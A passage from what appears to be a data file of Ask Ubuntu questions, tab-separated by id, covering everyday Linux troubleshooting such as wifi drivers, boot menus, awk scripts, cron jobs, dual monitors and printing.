series/3400 series chipset smbus controller ( rev 06 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 06 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) 02:00.0 ide interface : jmicron technology corp. jmb368 ide controller 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
391478	no wireless on 13.10 with netis 2113 adapter	on my new desktop , i 've put together a dual-boot with windows 7 and ubuntu 13.10 . because my desk is nowhere near any ethernet access , i added in a wifi adapter to the build . the model is a netis wf-2113 pci-e adapter . as soon as ubuntu was finished installing , i could see all the nearby wifi networks , including the one in my home . however , attempting to connect to the network ( wpa2/personal ) fails , prompting for the password once again . before i continue , i 'd like to reiterate : plugging in to a hard line for any purpose is not feasible , which is the reason i 'm using a wifi card in the first place . ( i would need 100+ ft of cable plus a pack of hooks to avoid any tripping hazards , and drilling through the walls to create proper outlets would not be permitted by the landlord . ) root @ brian-ub : ~ # iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit=7 rts thr=2347 b fragment thr : off encryption key : off power management : off root @ brian-ub : ~ # iwlist wlan0 scan wlan0 scan completed : ... -- other hotspots omitted cell 03 - address : c0:83:0a:49:51:91 channel:6 frequency:2.437 ghz ( channel 6 ) quality=38/70 signal level=-72 dbm encryption key : on essid : '' team noodle arms '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000000085aacf9 extra : last beacon : 8ms ago ie : unknown : 00105465616d204e6f6f646c652041726d73 ie : unknown : 010882848b0c12961824 ie : unknown : 030106 ie : unknown : 0706555320010b1b ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( ! ) : psk ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( ! ) : psk ie : unknown : 2a0100 ie : unknown : 32043048606c ... -- other hotspots omitted root @ brian-ub : ~ # rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no the adapter works under w7 , so the issue is not with the password or with a malfunctioning adapter .
391479	ubuntu 12.04 powerpc installed on macpro g5 but boot menu not showing	i 'm somewhat of a linux novice having used ubuntu studio ( hardy ) on pc . i have installed ubuntu 12.04 for ppc on a g5 macpro without full success . i have some questions and hoping get this problem solved . initially wanted to install ubuntu with a real-time kernel for audio on a mac g5 ppc . the machine runs from ubuntu live cd for ppc ok. ( except shutdown ends in dotted lines on black screen and have to force power down ) . the machine has 2 hard drives . i installed ubuntu 12.04 from the ubuntu_powerpc_precise install cd . i meant to install on the 2nd hdd but missed the option to do that while installing . all seemed good during install with updates etc . upon booting no os chooser option menu shows up and the machine boots straight into osx just as normal , except that the 2nd hd does n't show up . using the live cd it appears ubuntu has installed onto the 2nd hd which is now in ext4 format ( which is no problem , but it would be good to be able to read from osx ) . i had made a smaller partition on the 2nd hd hoping to install the ubuntu system there but the installed file system appeared in the larger partition . from what i 've read so far i suppose my answer may have to do with yaboot ? ( which is a bit of a mystery to me atm . ) dual boot would be good but not absolutely neccessary . any suggestions on partitioning the 2nd drive ? what format would be good to use ? ext4 ? should i wipe the 2nd hd and re-install ? should i install to a partition on the osx hd instead ? also a bit confused about 32/64 bit . i think i might have done a 32 bit install because i did n't run the cd from the 64 bit option ? i am also wondering about an rt kernel ( if there is one for ppc ) . any help would be appreciated .
391480	how to organize many app icons ?	i do n't like to have too many launch icons in the unity launch bar ( using precise ubuntu ) . so i put my most used app icons on the desktop . however , i 'm now running out of space on the desktop . any suggestions as to how to put the least used app icons somewhere else in order to reduce the clutter on the desktop ?
391482	syntax error in awk program	i want to check the method of ip-assignment as in this question . i 'm running it in bash on ubuntu 12.04 . my problem is the function `` get_con_id ( ) '' gives me `` syntax error '' at the if-clause . the script is as following ( unmodified from the answer in the given question ) : # ! /bin/sh # get the connection id of the active connection get_con_id ( ) { nm-tool | awk ' $ 1 == `` - '' { dev = $ 3 id = dev if ( nf > 4 & & match ( $ 0 , `` \\ [ ( . * ) \\ ] '' , a ) ) id = a [ 1 ] } /^ / & & $ 1 == `` state : '' & & $ 2 == `` connected '' { print id } ' } # get the address type of the active connection nmcli con list id `` $ ( get_con_id ) '' | awk ' $ 1 == `` ipv4.method : '' { if ( $ 2 == `` manual '' ) print `` static '' else if ( $ 2 == `` auto '' ) print `` dynamic '' else print `` unknown '' } '
391483	ubuntu 13.10 not connecting to galaxy nexus through virtualbox	hope you are well . i 'm trying to install ubuntu touch on my galaxy nexus , i 'm using a ubuntu 13.10 running in virtualbox 4.3 on a xp machine . the problem is i can not run the installation as ubuntu does not connect to the nexus . i can see the nexus under the device option in virtualbox but when selecting it nothing happens . ive installed the extension pack for virtualbox to allow usb2.0 but still nothing . i am really keen to run ubuntu on the phone but i 'm at a lost from here . has anyone encountered a similar issue or know of a solution for this , it will be greatly appreciated .
391484	can ubuntu be put on a usb with wubi ?	i want to install ubuntu onto my 64gb usb and i want to use wubi . i am running windows 7 . is this possible ? also is the ubuntu on the wubi 32-bit or 64-bit ?
391489	ca n't use startx with lxde ?	i use lubuntu 13.10 and start default with `` text '' . when i need to use gui , startx did n't work , but `` service lightdm start '' is worked . how to use startx with lxde ? thank you !
391491	unity and phpstorm hotkeys conflict	i use ubuntu 13.10 and work in phpstorm . the problem is that the populat phpstorm hotkeys do n't work but unity 's hotkeys work instead . for example , by pressing alt+f1 i 'm expecting `` select target '' dialog but get the dash panel selected . is there some ways to fix this ?
391492	mixing legacy and uefi boot - windows 7 and ubuntu 13.10	i just installed windows 7 on an mbr disk ( ssd ) . i tried gpt , but there were a lot of issues . now , i am unable to boot from ubuntu usb in legacy bios so i booted in uefi mode . when i am trying to install ubuntu and select manual partition , should i install it in /dev/sda or /dev/sda1 ( which is a small ext4 partition i had reserved for boot . ) i can not designate the partition as boot , only efi boot option is available . if i install ubuntu to the efi boot partition , will windows keep working ?
391493	mysql - upgrade or new installation ?	i am running mysql 5.5.32 on an ubuntu-server 12.04.3 lts . i want to have the newest version of mysql on my machine , which at the moment seems to be 5.7.3 . all instructions i have seen say , that i have to upgrade from 5.5 to 5.6 and then from 5.6 to 5.7 . there seems to be no way to step directly from 5.5 to 5.7 . and all instructions contain lots of complicated steps that must be performed manually . but i think , this way should be much faster and much easier : make backups from all databases you created ( which means all but information_schema , mysql and performance_schema ) stop the mysql server uninstall mysql ( is this necessary ? ) install mysql 5.7.3 ( or what ever is the latest version ) start the mysql server load your backups into the new mysql server i have created 5 databases , the biggest with 25 tables . i did n't use any triggers , stored procedures , views , constraints , ... there are just the tables , nothing else . collation is set to utf8_general_ci , no other preferences have been changed . do you think the described method is a good idea or will there rise some problems ?
391499	wirless connection suddenly disapeared	i 'm running ubuntu on a virtual machine ( oracle vm virtual box ) for a couple of days now . up until this morning , everything worked just fine . this morning , when i opened up the vm , ubuntu suddenly does not recognize the wireless card , and only the wired connection is available ( eth0 ) . does anyone know what might be the problem ? thanks in advance .
391500	run x11 gui application from browser ( apache - php )	the same way as running gui app with php , i need to run a x11 application ( vlc ) from a php page on apache server . i need to open the vlc application on the server , not on the remote system . i 'm trying to get this through a php shell_exec call to a shell script containing the vlc commands . the sh script correctly opens the vlc app if launched from command line , but not through the php call , because it does not find ( i think ) any x11 session initiated : it returns related error messages : - inhibit interface error : failed to connect to the d-bus session daemon : //bin/dbus-launch terminated abnormally with the following error : no protocol specified - autolaunch error : x11 initialization failed . - main interface error : no suitable interface module - xcb_xv vout display error : parent window not available - ... if i grant the apache user , www-data , to connect to the x server xhost +local : www-data it works for the video but not for audio ; the windows opens and plays the video but without sound and still other error messages related to audio server ... export display=:0 does not seem to have any effect . any help would be appreciated .
391501	web page loading problem	i use firefox in ubuntu 12.04 for connecting to internet . some of the web pages ( randomly ) load normally at some times and does not load at all at other times . ( there is no problem in the web page as at the same time , if i connect to internet through my windows laptop , all pages are loading properly ) . i have configured my dsl connection properly and am using google 's opendns . even when the page does not load , the web page title appears and there it waits indefinitely . this is not a problem specific any one web page . need help in resolving this problem . i have tried using google chrome also and the problem persists .
391502	how can i be sure that ubuntu runs decently on dell inspiron 660 with the following specifics ?	i intend to buy a new dell inspiron 660 with the specifics below and i want to switch simultaneously to ubuntu . can i expect that ubuntu will run decently on this system or will i encounter problems ? would you recommend another system instead ? dell inspiton 660 : intel core i5-3330 ( 6m cache , up to 3.2 ghz ) 8 gb ddr3 sdram at 1600 mhz 2 tb-serial ata drive ( 7,200 upm ) nvidia geforce gt 620 1 gb dvd+/-rw drive dell wireless dw1506 regards clemens
391504	need help with ubuntu wifi problems !	yesterday i finally installed ubuntu on my old , hacked fujitsu siemens amilo a1650 laptop ( running windows xp home edition ) . it runs fine but uses time on opening some tasks but i can work with it just fine . it seems that deleting everything from windows also deleted the virus , but i found this pretty common problem , i can`t find my wifi connection ! i 've read other posts on the net and have seen people getting this fixed by different downloads and codes , but i ca n't fix this for some reason ! i 've tried everything i have found on the net but nothing worked ! i do n't know if i could n't get the downloads because my network is unstable or something else ( i have two internet connections one wifi and one mobile broadband one ) , but i really need help ! i currently live in norway and my network card is `` broadcom bcm4318 airforce one 54g '' . ( for you to know i ca n't use a ethernet cable on my modem because it does n't have a port to do it .
391505	wo n't wake up after suspend	i have freshly installed and updated 13.10 i suspended it for first time yesterday and today it would n't start up but just show a blank black page . the monitor goes in power save mode after a while . so nothing happens . the pc has 12gb ram and 13000 mbytes of swap partition if that matters .
391506	problem with mono and .exe file	i have purchased a piece of software to configure programable radio control transmitters . it says it will run on linux , see below : digital radio runs on : microsoft windows 2000/2003/xp microsoft windows vista/seven/2008 , linux ubuntu or a distribution with mono , 32 or 64 bit , also in a virtual machine . linux requires the mono package installed , with also the visual basic 2005 runtime library . the linux version is the same executable file of the windows platform , and can be execute using mono . you do n't need wine . all the tests have been done on ubuntu desktop 10.10 i have tried for weeks to get the drivers for the cable to work in xp or win7 and i admit defeat . it looks like ubuntu can run the cable effortlessly but now i ca n't get the software going . tried to run in ubuntu 10.04 with mono , gui failed and i got the following message in terminal . $ mono ~/desktop/gigradiolinux/digitalradio/digitalradio.exe the entry point method could not be loaded windows installation requires using a 30 odd character passkey and a 4.24k text file as a `` license '' to be entered during running of the exe file . can someone tell me how i enter the passkey and license into terminal , or is that not my primary problem ? i do n't understand `` entry point method '' . tried wine and that did n't work either . the developer responded to my earlier emails re the cable drivers , but has n't replied to questions regarding this . if i have left out anything important let me know and i will try to supply more information .
391513	how to do svn update without password on crontab	i 'm new to svn and ssh . i 'm trying to do svn update of 5 repositories in my local system every 3 hours on crontab . so , to achieve this i have setup ssh passwordless login using the below steps : 1. ssh-keygen 2. ssh-copy-id -i ~/.ssh/id_rsa.pub test @ repo.test.in 3 . i did ssh test @ repo.test.in till here it works fine for me . i 'm able to login without password . but , when i try to do sudo svn update on the 5 repositories , it is propmpting for password . how to make svn update without password . is there any way that i can do update of the repositories every 3 hours on cron . i referred to this , but could not get it . i 'm using `ubuntu version : ubuntu 13.04` openssh_6.1p1 debian-4 , openssl 1.0.1c 10 may 2012
391515	changing /etc/environment did not affect my environemtn variables	i 'm very new to ubuntu so please bare with me . i 'm trying to install euler expert system following those instructions to add the environment variable i edited my /etc/environment to become as follows : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/mohammad/desktop/eye '' eye_home = `` /home/mohammad/desktop/eye '' but when i use printenv path i do n't see the new directory added to my path . what am i doing wrong here ?
391518	bash : alias : alias : not found	when i log in , i see the error : bash : alias : alias : not found if i source my .bashrc file , the message appears again . what is causing this ?
391522	how to restrict 3d ( unity 3d ) usage to only one screen	i got dual monitor setup , configuration is like this : xrandr -- output hdmi-0 -- above lvds and unity 3d became irratatingly slow . for example character appears only 1 second after i key in them . minimize a window and i see it fades away in slow motion . turns off one monitor brings the speed back . i suspect 3d desktop caused this , or the radeon ( 4 ) xorg driver . i use a fullscreen xterm console on one screen , and it does absolutely nothing than displaying xterminal . i work heavily on that terminal . for this solo purpose there is no need of 3d desktop . can i restrict unity 3d and everything only on one monitor , and leave the other for a pure console ? what i tried : i tried to restrict x.org on one monitor only , thus , the other monitor in theory should stay in virtual console ( the one associated with ctrl+alt+f1 ) - a good-enough replacement of xterm . i should be able to swtich focus from x to virtual console and back , while keep both displaying . it failed to work . x always grab both monitors , even if configured not to do so -- this behaviour reported as a bug : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1261371
391528	start terminator via shell script in broadcast mode	i currently use a small script to start a terminator window as a background process which has multiple splits specified with a layout . terminator -- layout=my_layout & i want to execute a command to connect to a remote server in all the splits . when i use this , terminator -- layout=my_layout -x command_to_connect arg1 arg2 & only the 1st window is connected . how do i broadcast the message to all the windows from my script ? i have a key binding specified for broadcast . how do i use that when starting a new window ?
391532	gui tool to search files in jar	i am looking for a gui search tool which searches inside a folder and its sub folders ( recursively ) including archive files contents ( jar , zip , tar etc ) . i saw the krusader search dialog but unfortunately it is not supporting jar archives ( support only tar , zip etc ) . see here . note : we need to select `` search in archives '' option . is there any way to include jars in krusader search or is there any alternative gui tool exists to do this . note that i tried gnome-search-tool or nautilus search tool but these are not suitable .
391533	how do i put a shortcut icon in the launcher and delete it from the desktop ?	with play on linux shortcuts are added to the desktop . i would like to keep it as clean as possible , so instead i 'd prefer it to be on the launcher . and in general when i drag and drop something onto the launcher then i can not delete it without the launcher icon being deleted aswell . any ideas as to why this happens ? any help would be much appreciated . also please use step by step explanation in answers as i am a relative new user . the ubuntu release is the 12.04 lts .
391535	can i upgrade ubuntu 12.04 ( dual boot ) to 13.04 from a dvd	i use ubuntu 12.04 lts on a dual boot system . i upgraded my pc 's motherboard to gigabyte ga-h77m-d3h motherboard . 12.04 no longer sees the network interface ! i now want to upgrade to 13.04 . is there a 13.04 download i can put onto a dvd and then upgrade 12.04 after i have booted up 12.04 ?
391542	how to add the logs to a crontab with time stamp	in crontab , i scheduled a daily backup script . now when the cron executes the script the status are logged to a log file as shown below . 0 0 * * * /home/backup.sh > /home/groupz/db-backup/fbackup.log 2 > & 1 now , when the cron executes a script the contents of the log get renewed everytime . so , i want the contents to be added to the same file with time stamp of the executed time and below the contents of each time along with the existing contents . how can i do this .
391543	how solve `` sudo : must be setuid root '' on joyent server	i have a server ubuntu 12.04 lts on joyent . mistakenly i have changed the /user/* folders permission to 775 . after this i can not able to run any sudo command . rebooting the system in recovery mode will solve the issue . but i dont know to how achive this using remote session command line . is there any solution , to fix this issue remotely .
391544	how to mount a truecrypt volume with cryptsetup 1.6 and above via pam_mount ?	i installed cryptsetup 1.6.2 in 13.10 from this ppa . versions above 1.6 feature truecrypt volume support and i can successfully mount my volume from the terminal but have n't been able to automatically mount the volume at login via pam_mount . mounting a luks volume as /home via pam_mount using the following example in /etc/security/pam_mount.conf.xml works , but it does not work for truecrypt : < volume user= '' user '' fstype= '' crypt '' path= '' /dev/sda3 '' mountpoint= '' /media/personal '' options= '' fsck , relatime '' / > i also tried : fstype= '' tcrypt '' , which does not work . it seems to be an invalid argument . fstype= '' auto '' , which tries to mount the partition as ext3 and ext4 , which does not work . the filesystem on the volume is ntfs and the volume was created with truecrypt . reading the manpage for mount.crypt did n't solve my problem . question : how can i mount a truecrypt volume with cryptsetup at login via pam_mount ? what would be the proper configuration line ?
391545	my new laptop is powerful , how can i use all its power for ubuntu ?	i 've recently changed my laptop to a much powerful one and i 'm wondering how can i tweak ubuntu to use all the hardware power to speed up system . my previous laptop was a i3 sony vaio , and my current laptop is a i7 toshoba with 16 gb of ram . specs are : intel® core™ i7-4700mq processor 16gb ddr3l 1600mhz memory 1.0tb ( 5400 rpm , serial ata ) mobile intel® hd graphics ‌based on my experience with my old laptop , i expected to gain a huge performance improvement with this much more powerful laptop . actually ubuntu is fast enough but sometimes it takes time for a window to open up ( like system settings ) , so is there anything to improve the performance ? ( i know the obvious advise whould be to change hdd with an ssd one , but at the moment i 'm a little short on money ... ) i did this tweaks already : i installed preload changed the value of swappiness to 10 installed zram-config ( i do n't know if it helps or not since my laptop has lots of ram ) moved /tmp directory to ram also there are few things that bother me : when i login to ubuntu , screen turns black for few seconds and then desktop is shown function keys on my laptop are reversed but in ubuntu i need to hold down fn to access those functions ( i.e . f7 key should play/pause music by default and to access actual f7 command , fn sholud be held down , but in ubuntu it 's opposite ) touchpad is multi-touch but i cant set 3-4 finger gestures even though i installed touchegg keyboard is backlit and fn+z should turn light on/off , but it does n't work under ubuntu and one thing else , the laptop has touch screen display , i do n't really use this feature ( i even did n't know about it when i ordered ) , but is there any package or anything that lets ubuntu use this feature in a more specific way ? ( i do n't think so , just a long shot ; ) ) thanks
391546	how to download packages from a repository that is not in sources.list	i 'm remastering a cd for ubuntu 10.04 ( lucid ) , but that is not the version i 'm running and i do n't want to add its repositories in souces.list . is there a way to download the latest versions of its packages from the repository without editing sources.list ?
391548	grub2 : please explain me what does this command do ?	i 'm learning grub2 . the following code shows a menu entry to boot an ubuntu image . > menuentry `` ubuntu 12.04.2 iso '' { > set isofile= '' /home/ < username > /downloads/ubuntu-12.04.2-desktop-amd64.iso '' > # or set isofile= '' / < username > /downloads/ubuntu-12.04.2-desktop-i386.iso '' > # if you use a single partition for your $ home > loopback loop ( hd0,5 ) $ isofile > linux ( loop ) /casper/vmlinuz.efi boot=casper iso-scan/filename= $ isofile noprompt noeject > initrd ( loop ) /casper/initrd.lz } can somebody explain me what does the `` boot=casper '' and `` iso-scan/filename= $ isofile '' in the above code do ?
391549	firefox using a lot of memory	my computer keeps freezing once firefox gets over 250mb of memory . it keeps swinging between 200 and 250 . what 's going on and how can i remedy the situation ? output of free -m : total used free shared buffers cached mem : 7887 5089 2798 0 245 3397 -/+ buffers/cache : 1446 6441 swap : 8091 0 8091
391551	micromax 3g dongle can not find driver usbserial_generic	i have performed all terminal commands to connect usb modem micromax mmx352g in ubuntu 12.04 but i am getting something different like this . in other devices driver found is usbserial_generic what should i do now to connect usb with driver ?
391552	blank second monitor ( error about virtual resolution ? )	good afternoon , has somebody experience or knowledge how to solve following problem ( see below ) . thank you in advance ! i have lcd monitor connected to my hp elite-book 8470w laptop . however after logging into ubuntu 12.04 lts second monitor goes blank . ( i wrote after logging , because login page is displayed on both screens , although resolution is quite low ) . i have tried turn on the display in system setting but the response is : requested position/size for crtc 148 is outside the allowed limit : position= ( 1600 , 0 ) , size= ( 1024 , 768 ) , maximum= ( 1600 , 1600 ) followed by gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : requested position/size for crtc 148 is outside the allowed limit : position= ( 1600 , 0 ) , size= ( 1024 , 768 ) , maximum= ( 1600 , 1600 ) xrandr says : screen 0 : minimum 320 x 200 , current 1600 x 900 , maximum 1600 x 1600 lvds connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 310mm x 174mm 1600x900 60.0*+ 40.0 1440x900 60.0 40.0 1280x768 60.0 40.0 1280x720 60.0 40.0 1024x768 60.0 40.0 1024x600 60.0 40.0 800x600 60.0 40.0 800x480 60.0 40.0 640x480 60.0 40.0 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) dfp5 disconnected ( normal left inverted right x axis y axis ) dfp6 disconnected ( normal left inverted right x axis y axis ) dfp7 disconnected ( normal left inverted right x axis y axis ) dfp8 disconnected ( normal left inverted right x axis y axis ) dfp9 disconnected ( normal left inverted right x axis y axis ) dfp10 disconnected ( normal left inverted right x axis y axis ) dfp11 disconnected ( normal left inverted right x axis y axis ) dfp12 disconnected ( normal left inverted right x axis y axis ) crt1 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 + 75.0 70.1 1280x1024 75.0 60.0 1280x960 75.0 60.0 1280x768 75.0 60.0 1280x720 75.0 60.0 1024x600 75.0 70.1 60.0 800x600 72.2 75.0 60.3 56.2 800x480 72.2 75.0 60.3 56.2 640x480 75.0 72.8 67.0 59.9 however , when i set very low resolution on both screens , both displays work ok . i was n't able to find answer how to increase overall resolution in system . thank you for your time .
391555	how to install ubuntu touch on lg p990	i wish to install ubuntu touch on my lg p990 . how do i do that ? i remember somebody like ruglez was working on ubuntu touch rom for lg p90 , has that effort stopped been stopped ?
391557	how can i edit usr/bin	i 'm trying to run chromium os from within ubuntu 13.10 64-bit . i 'm running into a couple of issues , and one of the possible solutions i 've found requires editing a file called usr/bin/chromeos . i assumed i could enter that file name in the terminal and it would give me the text editor so i could edit it . however , i get this response : $ /usr/bin/chromeos bash : /usr/bin/chromeos : no such file or directory what can i do ? i think i 've had this happen before when trying to edit other files like this . thanks !
391559	what can i do to be member of the ubuntu community ?	i want to be member of the ubuntu community.what can i do , please help me
391561	thinkcentre m72e amd graphics setup	the amd catalyst drivers for thinkcentre m72e are n't working even though it 's a ubuntu certified machine . it installs the drivers but i get the hardware not supported error . i removed the installed drivers and tried the one downloaded from amd support website , but the installer says that the graphics adapter is not supported . the card is an amd hd7450 . i 'm using ubuntu lts 12.04.3 with xserver version 1.13.3 . any kind of help is appreciated as i do n't know what to do at this stage .
391563	how to uninstall the default desktop environment of ubuntu12.04 ?	i have installed ubuntu 12.04 but i really do n't like the default desktop environment . i want to uninstall it and install gnome . but i do n't know which package should i remove . can somebody help me ?
391564	how do you use chirp ?	chirp is an amateur radio program that will help program your radio from a computer . my radio is a wouxun and the module is a kg-uv3d.the documentation says that is will work on this module , but there is not a setting for it so i got as close as i could . the cable looks like this : what i am trying to do is follow the instructions but i keep getting stuck . first , you click on the radio link . next , i click download from radio . from there i get this picture . after clicking ok , i get this error message : could not open port /dev/ttys0 : [ errno 13 ] permission denied : '/dev/ttys0' can anyone tell me how to fix this problem ? once again , thank you in advance for any assistance you may have to offer .
391566	how to setup individual user file sharing for a partition	i am a linux/ubuntu novice . i am taking an old dell and refashioning it into a file/print server . during install i took the 320gb drive , assigned 10gb to root , and the remaining 310 to a partition that i am mounting as /share so that when i go into the file system and view everything in / i see the /share folder . i followed how do i share a folder on a ntfs partition over the network ? to get it set up so that i can make changes to that particular partition . i put several folders in the /share , one for itunes ( i 've already linked itunes to this library and it works perfectly ) , and a personal folder for myself , my wife , and my son . i 've mapped the folder to a drive on my machine and manually entered the user information so that i can see all the folders . i want to set it up so that my wife has full access to the itunes folder /share/itunes/ and her personal folder , and my son has the same ... ( itunes and his personal folder ) ... i am ok setting it up in windows and mapping the drive directly to the folders for them , but i am completely lost on setting up their user information in ubuntu ... i am creating a user in ubuntu for each of them , but i need a bit of background/assistance on how to set up the individual security to get the desired results . edit i also added a pictures folder which contains all of our family pictures that i would like to share in the same fashion that the itunes folder is shared . any links to pertinent information would be greatly appreciated .
391567	12.04 , bizhub c360 , job successful , but does not print , should require authentification	i am trying to print to a network printer ( konica minolta bizhub c360 ) . i installed the printer with the driver supplied as the ppd : koc360ux.ppd the protocol is jetdirect . everything worked fine and the status information ( toner levels etc . ) of the printer is visible . but , when i print a test page the job finishes with status successful ( in under a second ) . in the printers job history it says : `` deleted due to error '' . authentication is required ( i know that from my windows using colleagues ) , but i am not asked for credentials . so i assume that the printer expects the credentials to be delivered immediately . there is no obvious option to supply the login information though . maybe it is possible to add them to the printers uri ? the current uri reads : socket : //10.162.183.136:9100 furthermore , in the printing options under the tab `` job '' one can add key value pairs . i tried with user = x and password = x . but it did not work . is there any way to make this work ? if you need more info , i 'll supply . edit : i am now printing from my windows vm , which is obviously a bad solution . but there i have to enter department and password . maybe that is a hint for the required parameter in ubuntu .
391568	how do i install a kernel driver so that it is not loaded at all times ?	i would like to install a kernel driver that is under development and i 'm afraid that it could affect the stability of my system . so i would like this driver to only be loaded at certain times ( when i want to help debug it ) . how can i do it ? i expect to be able to do this with a grub option , but if this is achievable some other way ( e.g . install it for a certain user ) , that 's ok too . my goal is to keep the experimental driver from affecting stability of the system . it would be nice to know how to remove the driver altogether , too , if i mix something up in the installation process , or if i experience bugs and want to revert a system to a working state . i recently had to reinstall ubuntu from scratch because my laptop kept shutting down at random , until it did n't boot . while it could be some hardware issue , i ca n't rule out a possiblilty that it was caused by a faulty kernel module . if i start experiencing troubles again , i want to be able to make sure whether it is a consequence of new driver or not . my system is ubuntu 13.10 32-bit on thinkpad x200
391570	wired connection problem using pppoe on ubuntu 13.10	i 'm new to ubuntu ( linux ) , i had a problem with wired connection on ubuntu 13.10 . here is the problem : my laptop dual boots ubuntu 13.10 and windows 7 . i set my router to use pppoe to connect the internet . now i can pulg the cable coming from the router to my laptop to directly get access to internet without any settings on windows 7 . this worked when i used ubuntu 12.04 , i used to just plug the cable to my laptop and connect to the internet , but after upgrading to ubuntu 13.10 , i could n't connect to internet using the same method . now i can connect to the internet using wi-fi only . i can connect to the router using cable on both ubuntu and windows . i also can connect to the internet by setting up a dsl connection on both ubuntu and windows . here is the result of ifconfig-a : eth0 link encap : ethernet hwaddr 78:84:3c : ae:3d:24 inet addr:192.168.1.105 bcast:255.255.255.255 mask:255.255.255.0 inet6 addr : fe80 : :7a84:3cff : feae:3d24/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4106 errors:0 dropped:143 overruns:0 frame:0 tx packets:2270 errors:0 dropped:0 overruns:0 carrier:39 collisions:0 txqueuelen:1000 rx bytes:1413127 ( 1.4 mb ) tx bytes:270308 ( 270.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3059 errors:0 dropped:0 overruns:0 frame:0 tx packets:3059 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:328553 ( 328.5 kb ) tx bytes:328553 ( 328.5 kb ) wlan0 link encap : ethernet hwaddr 64:27:37:9a : ec:7d inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :6627:37ff : fe9a : ec7d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10470 errors:0 dropped:0 overruns:0 frame:0 tx packets:10498 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4805625 ( 4.8 mb ) tx bytes:1874594 ( 1.8 mb ) and here is the result of sudo pppoeconf : sorry , i scanned 2 interfaces , but the access concentrator of your provider did not respond . please check your network and modem cables . another reason for the scan failure may also be another running pppoe process which controls the modem . can anyone tell me how to solve this problem ? i want to connect to the internet using cable . i will be very thankful if someone help me solve the problem . and also sorry for my poor english . thank you all .
391572	how to install software in a new upgrade ubuntu ?	i just upgraded my ubuntu from ubuntu 11.10 to ubuntu 13.04 but i ca n't even install any softwares in it . how to fix it ? thanks !
391576	my ubuntu 12.04 file system are corrupted	my file system has corrupted and my ubuntu 12.04 never boot , and i tried to fix it by live cd , and nothing happen .
391580	when i click on downloads , files ( file manager ) totally closes itself	i 'm a total newbie to ubuntu and linux in general , so please keep it at very basic english please . : ) my problems/issues : 1 ) downloads closes itself 2 ) javascript ? 3 ) ubuntu-friendly alternative to slimcleaner . 1 . ) this morning i downloaded a video to my downloads folder using deluge . later when i wanted to watch the movie i opened files , then clicked on downloads ... and files closed itself straight away . i once again clicked files , but instead of clicking on downloads i clicked on the other folders like documents and pictures . they opened fine . but seconds after i clicked and opened downloads it closes files completely . i am totally baffled by this . i opened files again , right-clicked on downloads and ran a virus scan with clamtk on downloads . there is/was something like 10 files in there , and a virus did pop up , something like .phishing.bank or something . i quarantined it , but the problem still persist . on askubuntu i searched everywhere , also googled for a solution . the nearest page describing my problem is at nautilus closes immediately when i click on folder/desktop empty , but there 's no solution there even for an older version than my ubuntu 13.10 . i tried everything else i could think of . i did restart the computer , i even used the search function to get the video , then moved the video from there to a windows folder ( i 'm running ubuntu next to windows 7 ultimate ) and then i deleted the movie 's folder in downloads while still in the search bar . but when opening files again , then clicking downloads , it only opens for a few secons allowing me to see what is inside before it closes files ( or file manager , what is the right name ? ) again . i tried clicking 'downloads ' on the left-hand pane ( the grey one ) as well as the right-hand ( white/pink ) pane , same story . updates are up to date . using ubuntu 13.10 . anyone that wants to share my baffle and come of with a brilliant easy to understand solution ? : ) oh , i just remember : yesterday evening i 'cut ' most of the files ( not all ) in ubuntu downloads , and pasted them in windows downloads because my space on the ubuntu side is only 30 gb . when i checked downloads 30 minutes ago ( for the few seconds before it closed itself again ) those files are still showing in ubuntu downloads , but all of them 0 kb in size . and when i checked just now , they showed with their original file sizes again ! yesterday evening i also changed the default grid view that files and folders are shown in , to 'tree view ' after i discovered 'file preferences ' . right now i opened 'files ' > preferences again and changed it back to grid view . but a minute later i opened preferences again and change it back to list view ... but after closing the settings panel it stayed in grid view even though it should 've shown files in list view . so i closed files and re-open it again , just to see it is now in list view again . downloads on the windows-side works fine , it is only ubuntu 's downloads ' folder that are playing ghost-ghost with me . 2 . ) another thing : ant video downloader suddenly stopped working yesterday afternoon , saying something about a java/javascript error when i tried to download a video that it detected at youtube . so i installed something about/from java at ubuntu software center ( ca n't remember the name , and do n't know where to look for it , i 'm newbie remember , all that i know is it got good stars and reviews there and is not from oracle ) , but that did not 